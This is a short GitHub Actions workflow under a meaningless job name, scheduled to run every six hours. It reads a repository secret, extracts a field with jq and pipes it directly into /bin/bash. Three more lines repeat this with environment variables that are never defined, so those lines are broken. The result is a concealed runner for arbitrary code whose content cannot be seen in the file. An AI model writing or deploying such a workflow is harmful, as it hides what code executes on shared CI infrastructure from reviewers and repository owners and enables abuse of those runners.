name: caocao19870106

on:
  workflow_dispatch:
  schedule:
    - cron: '49 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870106
        env:
          f497: ${{ secrets.f497 }}
        run: |
          echo $f497 | jq -r .zv942 | /bin/bash
          echo $uni7 | jq -r .tvh203 | /bin/bash
          echo $rvyuo54 | jq -r .i5 | /bin/bash
          echo $masut3459 | jq -r .bmj44 | /bin/bash

